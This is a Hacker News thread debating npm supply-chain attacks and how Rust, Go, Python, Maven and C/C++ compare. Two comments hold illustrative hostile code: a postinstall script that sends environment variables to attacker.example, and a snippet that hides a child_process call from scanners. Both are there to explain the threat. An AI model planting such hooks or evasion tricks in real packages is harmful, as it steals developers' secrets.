Comment by vintagedave
4 days ago
Serious question: should someone develop new technologies using Node any more?
A short time ago, I started a frontend in Astro for a SaaS startup I'm building with a friend. Astro is beautiful. But it's built on Node. And every time I update the versions of my dependencies I feel terrified I am bringing something into my server I don't know about.
I just keep reading more and more stories about dangerous npm packages, and get this sense that npm has absolutely no safety at all.
It's not "node" or "Javascript" the problem, it's this convenient packaging model.
This is gonna ruffle some feathers, but it's only a matter of time until it happens in the Rust ecosystem, which loves to depend on a billion subpackages, and it won't be the fault of the language itself.
The more I think about it, the more I believe that C, C++, or Odin's decision not to have a convenient package manager that fosters a Cambrian explosion of dependencies is a very good idea security-wise. Ambivalent about Go: they have a semblance of a packaging system, but nothing as reckless as allowing third-party tarballs uploaded to the cloud to effectively run code on the dev's machine.
I've worried about this for a while with Rust packages. The total size of a "big" Rust project's dependency graph is pretty similar to a lot of JS projects. E.g. Tauri, last I checked, introduces about 600 dependencies just on its own.
Like another commenter said, I do think it's partially just because dependency management is so easy in Rust compared to e.g. C or C++, but I also suspect that it has to do with the size of the standard library. Rust and JS are both famous for having minimal standard libraries, and what do you know, they tend to have crazy-deep dependency graphs. On the other hand, Python is famous for being "batteries included", and if you look at Python project dependency graphs, they're much less crazy than JS or Rust. E.g. even a higher-level framework like FastAPI, that itself depends on lower-level frameworks, has only a dozen or so dependencies. A Python app that I maintain for work, which has over 20 top-level dependencies, only expands to ~100 once those 20 are fully resolved. I really think a lot of it comes down to the standard library backstopping the most common things that everybody needs.
So maybe it would improve the situation to just expand the standard library a bit? Maybe this would be hiding the problem more than solving it, since all that code would still have to be maintained and would still be vulnerable to getting pwned, but other languages manage somehow.
I wouldn't call the Rust stdlib "small". "Limited" I could agree with.
On the topics it does cover, Rust's stdlib offers a lot. At least on the same level as Python, at times surpassing it. But because the stdlib isn't versioned it stays away from everything that isn't considered "settled", especially in matters where the best interface isn't clear yet. So no http library, no date handling, no helpers for writing macros, etc.
You can absolutely write pretty substantial zero-dependency Rust if you stay away from the network and async.
Whether that's a good tradeoff is an open question. None of the options look really great.
24 replies →
It's already happening: https://cyberpress.org/malicious-rust-packages/
My personal experience (YMMV): Rust code takes 2x or 3x longer to write than what came before it (C in my case), but in the end you usually get something much more likely to work, so overall it's kind of a wash, and the product you get is better for customers - you basically front load the cost of development.
This is terrible for people working in commercial projects that are obsessed with time to market.
Rust developers on commercial projects are under incredible schedule pressure from day 0, where they are compared to expectations from their previous projects, and are strongly motivated to pull in anything and everything they can to save time, because re-rolling anything themselves is so damn expensive.
10 replies →
> Rust and JS are both famous for having minimal standard libraries
I'm all in favor of embiggening the Rust stdlib, but Rust and JS aren't remotely in the same ballpark when it comes to stdlib size. Rust's stdlib is decidedly not minimal; it's narrow, but very deep for what it provides.
The C standard library is also very small. The issue is not the standard library. The issue is adding libraries for snippets of code and, in the name of convenience, letting those libraries run code on the dev machine.
3 replies →
This is a reason why so many enterprises use C#. Most of the time you just use Microsoft-made libraries and rarely bring in 3rd-party ones.
8 replies →
And yet of course the world and their spouse import requests to fetch a URL and view the body of the response.
It would be lovely if Python shipped with even more things built in. I’d like cryptography, tabulate/rich, and some more featureful datetime bells and whistles a la arrow. And of course the reason why requests is so popular is that it does actually have a few more things and ergonomic improvements over the builtin HTTP machinery.
Something like a Debian Project model would have been cool: third party projects get adopted into the main software product by a sworn-in project member who acts as quality control / a release manager. Each piece of software stays up to date but also doesn’t just get its main branch upstreamed directly onto everyone’s laps without a second pair of eyes going over what changed. The downside is it slows everything down, but that’s a side-effect of, or rather a synonym for, stability, which is the problem we have with npm. (This looks sort of like what HelixGuard do, in the original article, though I’ve not heard of them before today.)
10 replies →
It might solve the problem, in as much as the problem is that not only can it be done, but it’s profitable to do so. This is why there’s no Rust problem (yet).
It won't; it's a culture issue.
Most Rust programmers are mediocre at best and really need the memory-safety training wheels that Rust provides. Years of Node.js mindrot has somehow made pulling in random dependencies on irregular release schedules the norm for these people. They'll just shrug it off, come up with some "security initiative", and continue the madness.
1 reply →
I agree partly. I love cargo and can’t understand why certain things like package namespaces and proof of ownership aren’t added at a minimum. I was mega annoyed when I had to move all our Java packages from jcenter, which was a mega easy set-up-and-forget affair, to Maven Central. There I suddenly needed to register a group name (a namespace, mostly a reverse domain) and prove it with a DNS entry. Then all packages have to be signed, etc. In the end, it was way ahead of its time. I know that these measures won’t help in all cases. But the fact that at least on npm it was possible for someone else to grab a package ID after an author pulled their packages is kind of alarming. Dependency confusion attacks are still possible on cargo because the whole - vs _ delimiter question wasn’t settled in the beginning. But I don’t want to go away from package managers or easy-to-use/sharable packages either.
> But the fact that at least on npm it was possible for someone else to grab a package ID after an author pulled their packages is kind of alarming.
Since your comment starts with commentary on crates.io, I'll note that this has never been possible on crates.io.
> Dependency confusion attacks are still possible on cargo because the whole - vs _ delimiter question wasn’t settled in the beginning.
I don't think this has ever been true. AFAIK crates.io has always prevented registering two different crates whose names differ only in the use of dashes vs underscores.
> package namespaces
See https://github.com/rust-lang/rust/issues/122349
> proof of ownership
See https://github.com/rust-lang/rfcs/pull/3724 and https://blog.rust-lang.org/2025/07/11/crates-io-development-...
4 replies →
I'm a huge Go proponent but I don't know if I can see much about Go's module system which would really prevent supply-chain attacks in practice. The Go maintainers point [1] at the strong dependency pinning approach, the sumdb system and the module proxy as mitigations, and yes, those are good. However, I can't see what those features do to defend against an attack vector that we have certainly seen elsewhere: project gets compromised, releases a malicious version, and then everyone picks it up when they next run `go get -u ./...` without doing any further checking. Which I would say is the workflow for a good chunk of actual users.
The lack of package install hooks does feel somewhat effective, but what's really to stop an attacker putting their malicious code in `func init() {}`? Compromising a popular and important project in this way would likely be noticed pretty quickly. But compromising something widely-used but boring? I feel like attackers would get away with that for a period of time that could be weeks.
This isn't really a criticism of Go so much as an observation that depending on random strangers for code (and code updates) is fundamentally risky. Anyone got any good strategies for enforcing dependency cooldown?
[1] https://go.dev/blog/supply-chain
A big thing is that Go does not install the latest version of transitive dependencies. Instead it uses minimal version selection (MVS), see https://go.dev/ref/mod#minimal-version-selection. I highly recommend reading the article by Russ Cox mentioned in the ref. This greatly decreases your chances of being hit by malware released after a package is taken over.
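Roughly, with hypothetical module names, MVS builds with the maximum of the versions that modules explicitly require, never silently with the newest release on the registry:

    // go.mod (hypothetical): your module asks for foo v1.2.0
    require example.com/foo v1.2.0

    // A dependency's go.mod asks for foo v1.1.0. MVS resolves to v1.2.0,
    // the highest version anyone explicitly requires, even if a (possibly
    // compromised) v1.5.0 has since been published upstream.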
In Go, access to the OS and exec requires certain imports, which must occur at the beginning of the file; this helps when scanning for malicious code. Compare this to JavaScript, where one can require("child_process") or import() at any time.
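A contrived sketch of what that means in practice (not from any real package):

    // JavaScript: nothing at the top of the file hints at OS access; the
    // capability is acquired at call time, under a name a scanner won't
    // grep for.
    function prettyPrint(data) {
      const mod = ["child", "process"].join("_"); // "child_process"
      require(mod).execSync("some-malicious-command");
      return JSON.stringify(data, null, 2);
    }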
Personally, I started to vendor my dependencies using go mod vendor and diffing after dependency updates. In the end, you are responsible for the effects of your dependencies.
In Go you know exactly what code you’re building thanks to go.sum, and it’s much easier to audit changed code after upgrading - just create vendor dirs before and after updating packages and diff them; send the diff to AI for basic screening if it’s >100k LOC, and/or review manually. My projects are massive codebases with 1000s of deps and >200MB stripped binaries of literally just code, and this is perfectly feasible. (And yes, I do catch stuff occasionally, though nothing actively adversarial so far.)
I don’t believe I can do the same with Rust.
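For reference, that workflow is just standard Go tooling plus diff (exact invocation a matter of taste):

    go mod vendor && cp -r vendor vendor-before   # snapshot current deps
    go get -u ./... && go mod tidy && go mod vendor
    diff -ru vendor-before vendor                 # review exactly what changed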
2 replies →
The Go standard library is a lot more comprehensive and usable than Node's, so you need fewer dependencies to begin with.
Aside from other security features already mentioned Go also doesn't execute code at compile time by design.
There is no airtight technical solution, for any language, for preventing malicious dependencies making it into your application. You can have manual or automated review using heuristics but things will still slip through. Malicious code doesn't necessarily look obvious, like decoding some base64 and piping it into bash, it can be an extremely subtle vulnerability sprinkled in that nobody will find until it's too late.
RE dependency cooldowns I'm hoping Go will get support for this. There's a project called Athens for running your own Go module proxy - maybe it could be implemented there.
> However, I can't see what those features do to defend against an attack vector that we have certainly seen elsewhere: project gets compromised, releases a malicious version, and then everyone picks it up when they next run `go get -u ./...` without doing any further checking. Which I would say is the workflow for a good chunk of actual users.
You can't, really, aside from full on code audits. By definition, if you trust a maintainer and they get compromised, you get compromised too.
Requiring GPG signing of releases (even just git commit signing) would help, but that's more work for people distributing their stuff, and inevitably someone will make an insecure but convenient way to automate it away from the developer.
Historically, arguments of "it's popular, so that's why it's attacked" have not held up. Notable among them was addressing Windows desktop security vulnerabilities. As Linux and Mac machines became more popular, not to mention Android, the security vulnerabilities in those burgeoning platforms never manifested to the extent that they did in Windows. Nor does cargo or pip seem to be infected with these problems to the extent that npm is.
> Nor does cargo or pip seem to be infected with these problems to the extent that npm is.
Easy reason. The target for malware injections is almost always cryptocurrency wallets and cloud credentials (again, mostly to mine cryptocurrencies). And the vast majority of stuff interacting with crypto and cloud, combined with a lot of inexperienced juniors who likely won't have the skill to spot that they got compromised, is written in Node.js.
Compared to the JS ecosystem and its number of users, both Python and Rust are puny. The npm ecosystem also allowed a lot of post-install actions by default, since they wanted to enable a smooth experience for compiling and installing native modules (not entirely sure how Cargo and pip handle native library dependencies).
As for Windows vs the other OSes: yes, even the Windows NT family grew out of DOS and Win9x and tried to maintain compatibility for users over security, up until it became untenable. So yes, the base _was_ bad when Windows was dominant, but it's far less bad today (which is why people go after high-value targets via npm etc., since it's an easier entry point).
Android/iOS are young enough that they had plenty of hindsight when it comes to security and could make better decisions (remember that MS tried to move to UWP/Appx distribution, but the ecosystem was too reliant on newer features for it to displace the regular ecosystem).
Remember that we've had plenty of annoyed discourse about "Apple locking down computers" here and on other tech forums when they've pushed notarization.
I guess my point is that people love to bash MS but at the same time complain about how security affects their "freedoms" when it comes to other systems (and partly MS). MS is better at the basics today than it was 20-25 years ago, and we should be happy about that.
6 replies →
> It's not "node" or "Javascript" the problem, it's this convenient packaging model.
That, and the package manager runs with all the same privileges and capabilities as the thing you're building, which is pretty insane when you think about it. Why should npm know anything outside of the project root even exists, or be given the full set of environment variables without so much as a deny list, let alone an allow list? Of course, if such restrictions were available, why limit them to npm?
The real problem is that the security model hasn't moved substantially since 1970. We already have all the tools to make things better, but they're still unportable and cumbersome to use, so hardly anything does.
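A defanged sketch of why that combination bites (placeholder domain; this is the shape of several real npm attacks):

    {
      "scripts": {
        "postinstall": "node -e \"require('https').get('https://attacker.example/?d='+Buffer.from(JSON.stringify(process.env)).toString('base64url'))\""
      }
    }

One install of a compromised package and every secret in the environment walks out the door.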
pnpm (maybe yarn too?) requires explicit allowlisting of build scripts; hopefully npm will do the same eventually.
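If I remember the mechanism right, it's an allowlist in package.json, something like:

    {
      "pnpm": {
        "onlyBuiltDependencies": ["esbuild", "sharp"]
      }
    }

Everything not listed gets installed with its lifecycle scripts skipped.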
> security model
Yep, some kind of seccomp or other permission system for modules would help a lot. (E.g. if a 3rd-party library is parsing something and its API only requires a Buffer as input and returns some object, then it could be marked "pure"; if it supports logging, then that could also be specified, and so on.)
2 replies →
Every time I look at a new project, my face falls when it's written in Rust. I simply don't trust a system that pulls in gigabytes of god-knows-what off the cloud, and compiles it on my box. It's a real barrier to entry, for me.
When I download a C project, I know that it only depends on my system libraries - which I trust because I trust my distro. Rust seems to expect me to take a leap in the dark, trusting hundreds of packagers and their developers. That might be fine if you're already familiar with the Rust ecosystem, but for someone who just wants to try out a new program - it's intimidating.
On Debian you can use the local crate registry for Rust, which is backed by Debian packages.
Though I will say, even as someone who works at a company that sells Linux distributions (SUSE), while the fact we have an additional review step is nice, I think the actual auditing you get in practice is quite minimal.
For instance, quite recently[1] the Debian package for a StarDict plugin was configured to automatically upload all text selected in X11 to some Chinese servers if you installed it. This is the kind of thing you'd hope distro maintainers would catch.
Though, having build scripts be executed in distribution infrastructure and shipped to everyone mitigates the risk of targeted and "dumb" attacks. C build scripts can attack your system just as easily as Rust or JavaScript ones can (in fact it's probably even easier -- look at how the xz backdoor took advantage of the inscrutability of autoconf).
[1]: https://www.openwall.com/lists/oss-security/2025/08/04/1
You don't know that about a C project. And you still don't know what lurks in its 1000th reimplementation of http header parsing.
2 replies →
I think this is right about Rust and Cargo, but I would say that Rust has a major advantage in that it implements frozen + offline mode really well (which if you use, obviously significantly decreases the risks).
Any time I tried the equivalent in the npm/Node world, it was basically unusable or completely impractical.
Pnpm (a very popular npm replacement) makes completely locked packages easy and natural and ultra fast:
https://pnpm.io/cli/install
Benchmarks:
https://pnpm.io/benchmarks
3 replies →
There are ecosystems that have package managers but also well developed first party packages.
In .NET you can cover a lot of use cases simply by using Microsoft libraries, and even a lot of OSS not directly part of the Microsoft org is maintained by Microsoft employees.
The 2020 State of the Octoverse security report showed that the .NET ecosystem has on average the lowest number of transitive dependencies. A big part of that is the breadth and depth of the BCL, standard libraries, and first-party libraries.
3 replies →
Sounds to me like another example of embrace - extend - extinguish
1 reply →
Supply chain attacks are scary because you do everything "right", but the ecosystem still compromises you.
But realistically, I think the sum total of compromises via package managers attacks is much smaller than the sum total of compromises caused by people rolling their own libraries in C and C++.
It's hard to separate from C/C++'s lack of memory safety, which causes a lot of attacks, but the fact that code reuse is harder is a real source of vulnerabilities.
Maybe if you're Firefox/Chromium, and you have a huge team and invest massive efforts to be safe, you're better off with the low-dependency model. But for the median project? Rolling your own is much more dangerous than NPM/Cargo.
The Rust (and really, any but JS) ecosystem has a bit more "due diligence" applied everywhere; I don't doubt someone will try to namesquat, but the chances of success are far smaller.
> The more I think about it, the more I believe that C, C++, or Odin's decision not to have a convenient package manager that fosters a Cambrian explosion of dependencies is a very good idea security-wise.
There was no decision in the case of C/C++; it was just not a thing languages had at the time, so the language itself (especially C) isn't written in a way that accommodates it nicely.
> Ambivalent about Go: they have a semblance of a packaging system, but nothing as reckless as allowing third-party tarballs uploaded to the cloud to effectively run code on the dev's machine.
Any code you download and compile is running code on the dev machine, and Go does have tools to do that in the compile process too.
I do, however, like the default namespacing by domain: there is no central repository to compromise, and forks of any defunct libs are easier to manage.
> The Rust (and really, any but JS) ecosystem has a bit more "due diligence" applied everywhere; I don't doubt someone will try to namesquat, but the chances of success are far smaller.
I really agree, and I feel like it's a culture difference. Javascript was (and remains) an appealing programming language for tinkerers and hobbyists, people who don't really have a lot of engineering experience. Node and npm rose to prominence as a wild west with lots of new developers unfamiliar with good practices, stuck with a programming environment that had few "batteries included," and at a time when supply chain attacks weren't yet on everybody's minds. The barriers to entry were low and, well, the ecosystem sort of reflected that. You can't wash that legacy away overnight.
Rust in contrast attracts a different audience because of the language's own design objectives.
Obviously none of this makes it immune, and you can YOLO install random dependencies in any programming language, but I don't think any language is ever going to suffer from this in quite the same way and to the same extent that JS has simply due to when and how the ecosystem evolved.
And really, even the JS of today is not the JS of yesteryear. Sure there are lots of bad actors and these bad npm packages sneak in, but also... how widely are all of them used? The maturation of and standardization on certain "batteries included" frameworks, rather than ad hoc piecing stuff together, has reduced the likelihood of going astray.
I have a similar opinion but I think Java's model with maven and friends hits the sweet spot:
- Packages are always namespaced, so typosquatting is harder
- Registries like Sonatype require you to validate your domain
- Versions are usually locked by default
My professional life has been tied to JVM languages, though, so I might be a bit biased.
I get that there are some issues with the model, especially when it comes to eviction, but it has been "good enough" for me.
Curious on what other people think about it.
Maven does not support "scripts" as NPM does, such as the pre-install script used for this exploit. With scripts enabled, the mere act of downloading a dependency requires a high degree of trust in it.
1 reply →
While I agree that dependency tree size can sometimes be a problem in Rust, I think it often gets overblown. Sure, having hundreds of dependencies in a "simple" project can be scary, but:
1) No one forces you to use dependencies with a large number of transitive dependencies. For example, feel free to use `ureq` instead of `reqwest`, which pulls the async kitchen sink in with it (see the Cargo.toml sketch below). If you see an unnecessary dependency, you could also ask the maintainers to potentially remove it.
2) Are you sure that your project is as simple as you think?
3) What matters is not number of dependencies, but number of groups who maintain them.
On the last point, if your dependency tree has 20 dependencies maintained by the Rust lang team (such as `serde` or `libc`), your supply chain risks are not multiplied by 20, they stay at one and almost the same as using just `std`.
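The Cargo.toml sketch mentioned above (illustrative version numbers):

    [dependencies]
    ureq = "2"          # small synchronous HTTP client, few transitive deps
    # reqwest = "0.12"  # would pull in tokio, hyper, and the async stack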
On your last note, I wish they would get on that signed crate subset. Having the same dependency tree as cargo, clippy, and rustc isn't increasing my risk.
Rust has already had a supply-chain attack propagating via build.rs some years ago. It was noticed quickly, so staying pinned to the oldest thing that worked and had no CVE pop up in cargo audit is a decent strategy. The remaining risk is that some more niche dependency you use is, and always has been, compromised.
Is serde maintained by the Rust team? I thought it was basically a one-man show owned by dtolnay
> The more I think about it, the more I believe that C, C++ or Odin's decision not to have a convenient package manager that fosters a cambrian explosion of dependencies to be a very good idea security-wise.
The safest code is the code that is not run. There is no lack of attacks targeting C/C++ code, and Odin is just a hobby language for now.
Don't worry about C or C++, we create the vulnerabilities ourselves!
I get the joke, but that makes me think.
Which is worse: writing potentially vulnerable code yourself, or having too many dependencies?
Finding vulnerabilities and writing exploits is costly, and hackers will most likely target popular libraries over your particular software, much higher impact, and it pays better. Dependencies also tend to do more than you need, increasing the attack surface.
So your C code may be worse in theory, but it is a smaller, and thus harder to hit, target. It is probably an advantage against undiscriminating attacks like bots, and a downside against targeted attacks by motivated groups.
I use C++ daily; whenever I do JS/TS or some JavaScript variant, since I don't use it daily, an update becomes a very complex task. Frameworks and deps change APIs very frequently.
It's also very confusing (and I think those attack vectors benefit exactly from that), since you have a dependency, but the dep itself depends on another dep's version.
Building a basic CapacitorJS/Svelte app, as an example, results in many deps.
It might be a newbie question, but: is there any solution or workflow where you don't end up with this dependency hell?
Don't use a framework? Loading a JS script on a page that says "when a update b" hasn't changed much in about 20 years.
Maybe I'm being a bit trite but the world of JavaScript is not some mysterious place separate from all other web programming, you can make bad decisions on either side of the stack. These comments always read like devs suddenly realizing the world of user interactions is more complicated and has more edge cases than they think.
There's no solution. The JS world is just nonstop build and dependency hell.
Being incredibly strict with TS compiler and linter helps a bit.
Not knowing that much about apt: isn't _any_ package system vulnerable, and isn't it purely a question of what guards are in place and what rights software is given upon install?
It's not the packaging tech. Apt will typically mean a Debian-based distro. That means the packages are chosen by the maintainers and updated only during specific time periods and tested before release. Even if the underlying software gets owned and replaced, the distro package is very unlikely to be affected. (Unless someone spent months building trust, like xz)
But the basic takeover... no, it usually won't affect any Debian style distro package, due to the release process.
3 replies →
Agreed with the first half, but giving up on convenient packaging isn't the answer.
Things like cargo-vet help, as does enforcing non-token auth, scanning, and required cooldown periods.
Out of the 789 npm packages in this incident, only 4 were ever used in any dependency tree of any Linux operating system (including Homebrew). Not in the affected versions, but ever.
If your Rust software observes a big enough chunk of the computer fever dream, you are likely to end up with a 2-3 digit number of Rust dependencies, but they are probably all going to be high-profile ones (tokio, anyhow, reqwest, the hyper crates, ...), instead of niche ones that never make it into any operating system.
This is not a silver bullet of course, but there seems to be an inverse correlation between "is part of any operating system dependency tree" and "gets compromised in an npm-like incident".
> The more I think about it, the more I believe that C, C++, or Odin's decision not to have a convenient package manager that fosters a Cambrian explosion of dependencies is a very good idea security-wise. Ambivalent about Go: they have a semblance of a packaging system, but nothing as reckless as allowing third-party tarballs uploaded to the cloud to effectively run code on the dev's machine.
The alternative that C/C++/Java end up with is that each and every project brings in its own Util, StringUtil, Helper or whatever class that acts as a "de facto" standard library. I personally had the misfortune of having to deal with MySQL's [1], Commons' [2], Spring's [3] and indirectly also ATG's [4] variants. One particularly unpleasant project I came across utilized all four of them, on top of the project's own "Utils" class that got copy-and-pasted from the last project and extended for this project's needs.
And of course each of these Utils classes has its own semantics, its own methods, its own edge cases and, for the "organically grown" in-house class that barely had tests, bugs.
So it's either a billion "small gear" packages with dependency hell and supply chain issues, or it's an amalgamation of many many different "big gear" libraries that make updating them truly a hell on its own.
[1] https://jar-download.com/artifacts/mysql/mysql-connector-jav...
[2] https://commons.apache.org/proper/commons-lang/apidocs/org/a...
[3] https://docs.spring.io/spring-framework/docs/current/javadoc...
[4] https://docs.oracle.com/cd/E55783_02/Platform.11-2/apidoc/at...
That is true, but the hand-rolled StringUtil won't steal your credentials and infect your machine, which is the problem here.
And what is wrong with writing your own util library that fits your use case anyway? In the C/C++ world, if it takes less than a couple of hours to write, you might as well do it yourself rather than introduce a new dependency. No one sane will add a third-party git submodule and wire it into the main Makefile just to left-pad a string.
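For scale, this is roughly the entirety of what the infamous npm left-pad package did (from memory, not verbatim):

    // pad str on the left with ch (default space) until it reaches len
    function leftPad(str, len, ch) {
      str = String(str);
      ch = ch || " ";
      while (str.length < len) str = ch + str;
      return str;
    }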
6 replies →
My feeling is that languages with other packaging models are merely less convenient, and there is no actual tangible difference security-wise. Just take C and replace "look for writable repositories" with "look for writable cmake/autoconf files": it simply takes more work, and is less uniform, to write a worm that replicates that way.
What would actually stop this is writing compilers and build systems in a way that isolates builds from one another. It's kind of stupid: all a compiler really needs is an input file, a list of dependencies, and an output file. Yet they all make it easy to root around, replicate, and exfiltrate. A build could be both convenient and not suffer from this style of attack.
Not really. cmake and automake are for compiling the library, not for downloading it. The gap between the two is what gets erased by npm. And it's made worse by the auto-update behavior that is on by default when `npm install` is run.
Not having a convenient package manager doesn't mean you don't need the functionality that's otherwise offered by third-party packages; it just means that you either need other means to obtain those third-party packages (usually reducing the visibility of the dependency!) or implement them yourself (sometimes this is good, but sometimes this can also be very bad for security: your DIY code won't get as many eyes and audits as the popular third-party package!).
Must read: https://wiki.alopex.li/LetsBeRealAboutDependencies
Indeed, Rust's supply-chain story is an absolute horror, and there are countless articles explaining what should be done instead (e.g. https://kerkour.com/rust-stdx)
TL;DR: ditch crates.io and copy Go, with decentralized packages based directly on source repositories, plus an extended standard library.
Centralized package managers only add a layer of obfuscation that attackers can use to their advantage.
On the other hand, C / C++ style dependency management is even worse than Rust's... Both in terms of development velocity and dependencies that never get updated.
> countless articles explaining what should be done instead (e.g. https://news.ycombinator.com/item?id=41727085#41727410)
> Centralized package managers only add a layer of obfuscation that attackers can use to their advantage.
They add a layer of convenience. C/C++ are missing that convenience because they aren't as composable and have a long tail of pre-package manager projects.
Java didn't start with packages, but today we have packages. Same with JS, etc.
2 replies →
I believe you, in that package management with dependencies and without security mitigations is both convenient and dangerous. And I certainly agree this could happen to other package managers as well.
My real worry, for myself re: the parent comment, is: it's just a web frontend. There are a million other ways to develop it. The sober, cold risk assessment is: should we, or should we have, and should anyone else, choose something npm-based for new development?
I.e. not a question about the potential risk for other technologies, but a question about the risk and impact for this specific technology.
> C/C++ .. a convenient package manager
Every time I fire up "cmake" I chant a little spell that protects me from the goblins that live on the other side of FetchContent, and promise to the Gods of the Repo that I will, eventually, review everything to make sure I'm not shipping poop nuggets .. just as soon as I get the build done, tested .. and shipped, of course .. but I never, ever do.
Surely in this case the problem is a technical one, and with more work towards a better security model and practices we can have the best of both worlds, no?
Agreed, Rust's cargo model is basically the worst part of that ecosystem right now. I've had developers submit pretty simple CLI tools with hundreds and hundreds of dependencies. I guess there weren't any lessons learned from the state of npm.
Just last month someone was trying to figure out from the cargo tree which Rust package got imported implicitly via which package. This will totally happen in Rust as well, as long as you use some kind of package manager. Go for zero or less dependencies.
It already did happen. It propagated via build.rs as well. But as I said elsewhere, it doesn't help you to forgo dependencies that are part of the Rust tooling itself.
less?
3 replies →
It’ll probably happen eventually with Rust, but ecosystem volume and informal packaging processes / a low barrier to entry seem to be significant drivers in the npm world.
(These are arguably good things in other contexts.)
I don’t get this
I installed the package, obviously I intend to run it. How does getting pwned once I run it manually differ from getting pwned once I install it? I’m still getting pwned
npm's default installation method does not really lock down your dependencies. It allows updates when the patch number (semver) is increased, which is why the malware bumps it. Anyone who then runs `npm install` will get it and will run the code.
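An illustrative package.json fragment (hypothetical names and versions; comments just for annotation):

    {
      "dependencies": {
        "some-lib": "^1.3.0",  // any 1.x >= 1.3.0: a malicious 1.3.1 gets picked up
        "other-lib": "1.3.0"   // exact pin: only changes when you change it
      }
    }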
In the early days the Node ecosystem adopted (from Unix) the notion that everything has to be its own micro-package. Not only was there a failure to understand what that notion was actually about, but it was never a good fit for package management to begin with.
I understand that there's been some course correction recently (zero dependency and minimal dependency libs), but there are still many devs who think that the only answer to their problem is another package, or that they have to split a perfectly fine package into five more. You don't find this pattern of behavior outside of Node.
> In the early days the Node ecosystem adopted (from Unix) the notion that everything has to be its own micro package.
The medium is the message. If a language creates a very convenient package manager that completely eliminates the friction of sharing code, practically any permutation of code will be shared as a library. As productivity is the most important metric for most companies, devs will prefer the conveniently-shared third-party library instead of implementing something from scratch. And this is the result.
I don't believe you can have packaging convenience and avoid dependency hell. You need some amount of friction.
1 reply →
Node is the embodiment of "move fast and break things". I probably would not build anything that should last more than a few months on Node.
Why the word "semblance" with regard to Go modules? Are you trying to say this system is lacking something?
An open question is why PyPI doesn’t have the same problem.
PyPI is also subject to supply chain attacks. What do you mean?
Maybe the solution is what Linux & co. have used for many years: have a team of people who vet and package dependencies.
Do they follow the same process? Or is it harder to submit a package and vet it on Rust/cargo?
I hate to be the guy saying AI will solve it, but this is a case where AI can help. I think in the next couple of years we’ll see people writing small functions with Claude/codex/whatever instead of pulling in a dependency. We might or might not like the quality of software we see, but it will be more resistant to supply chain attacks.
How is this going to solve the supply chain attack problem at all though? It just obfuscates things even more, because once an LLM gets "infected" with malicious code, it'll become much more difficult to trace where it came from.
If anything, blind reliance on LLMs will make this problem much worse.
When there's a dependency, it's typically not for a small function. If you want to replace a full dependency package with your own generated code, you'll need to review hundreds or even thousands of lines of code.
Now, will you trust that the AI didn't include its own set of security issues, and will you have the ability to review that much code?
I wonder what the actual result will be. LLMs can generate functions quickly, but they're also keen to include packages without asking. I've had to add a "don't add new dependencies unless explicitly asked" to a few project configs.
For sure. I don't think the software ecosystem has come to terms with how things are going to change.
Libraries will be providing raw tools: sockets, regex engines, cryptography, syscalls, specific file-format libraries.
LLMs will be building the next layer.
I have built successfully running projects now in Erlang, Scheme, and Rust - I know the basic syntax of two of those, but I couldn't have written my deployed software in any of them in the couple of hours of prompting it took.
For the Scheme one, it had to write a lot of code from first principles and warned me how laborious it would be - "I don't care, you are doing it."
I have tools now I could not have imagined I could build in a reasonable time.
An approach I learnt from a talk posted to HN (I forget the talk, not the lesson) is to not depend on the outside project for its code (just lift that code directly into your project), but to rely on it for the tests, requiring/importing it etc. when running your own tests. That protects you from a lot of things (this kind of attack was not mentioned, as far as I recall) but doesn’t allow bugs found by the other project to be missed either.
Then your dependency will be "AI getting it right every single time".
I don’t think I’ll live long enough to trust AI coding assistants with something like schema validation, just to name one thing I use dependencies for.
Go is just as bad.
Nope. Know the difference.
2 replies →
> but it's only a matter of time until it happens in the Rust ecosystem
Totally 100% agree, though tools like cargo tree make it more of a tractable problem, and running vendored dependencies is first class at least.
The one I am genuinely most concerned about is Golang. The way dependencies are handled leaves much to be desired; I'm really surprised that there haven't been issues, honestly.
The problem isn't specific to Node. npm is just the most popular repo, so it offers the most value to attackers. The same thing could happen on RubyGems, Cargo, or any of the other package managers.
NPM has about 4 million packages, Maven Central has about 3 million packages.
If this were true, wouldn't there have been at least one Maven attack by now, considering the number of NPM attacks that we've seen?
Been a while since I looked into this, but afaik Maven Central is run by Sonatype, which happens to be one of the major players for systems related to Supply Chain Security.
From what I remember (a few years old, things may have changed), they required devs to stage packages to a specific test env, and packages were inspected not only for malware but also for vulnerabilities before being released to the public.
NPM on the other hand... Write a package -> publish. Npm might scan for malware, they might do a few additional checks, but at least back when I looked into it nothing happened proactively.
1 reply →
There were. They're just not as popular here. For example https://www.sonatype.com/blog/malware-removed-from-maven-cen...
Maven is also a bit more complex than npm and had an issue in the system itself https://arxiv.org/html/2407.18760v4
As of 2024, Maven had 1.5 trillion requests annually vs npm's 4.5 trillion - regardless of package count, 3x more downloads in total does make it a very big target (numbers from https://www.sonatype.com/state-of-the-software-supply-chain/...).
No. Having many packages might not be the only reason to start an attack. This post shows it is/was possible in the Maven ecosystem: https://blog.oversecured.com/Introducing-MavenGate-a-supply-...
One speculation would be that most Java apps in the wild use way older Java versions (say 17 or 11, while the latest LTS is 21).
Okay then, explain to me why this is only possible with NPM? Does it have a hidden "pwn" button that I don't know about?
3 replies →
Make no mistake, Maven Central does get multiple malware components uploaded each year, though not nearly to the same extent as npm or pypi. Sonatype (my former employer) just doesn't report on these publicly each time it happens. It's not an isolated problem but certainly harder to do with maven.
2 replies →
How many daily downloads does Maven have?
The concern is not that it 'could' happen, but that it _does_ happen. I know this could occur in many places. But where it seems highly prevalent is npm.
And I am genuinely thinking to myself: is this making using npm a risk?
Just use dependency cooldown. It will mitigate a lot of risk.
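If you update via a bot, this is usually one setting; e.g. Renovate's knob is, I believe, minimumReleaseAge (formerly stabilityDays):

    {
      "packageRules": [
        { "matchManagers": ["npm"], "minimumReleaseAge": "14 days" }
      ]
    }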
3 replies →
NPM is the largest possible target for such an attack.
Attack an important package, and you can get into the Node and Electron ecosystem. That's a huge prize.
Value is one thing, but the average user (by virtue of the platform being popular) will just be less clued in on any security practices that could mitigate the problem.
I've started to feel it is much more an npm problem than a node problem. One of the things I've started leaning on more is prioritizing packages from JSR [0]. JSR is a part of Deno's efforts, so is often easiest to use in Deno packages, but most of the things with high scores on JSR get cross-published to npm and the few that prefer JSR only there's an alright JSR bridge to npm.
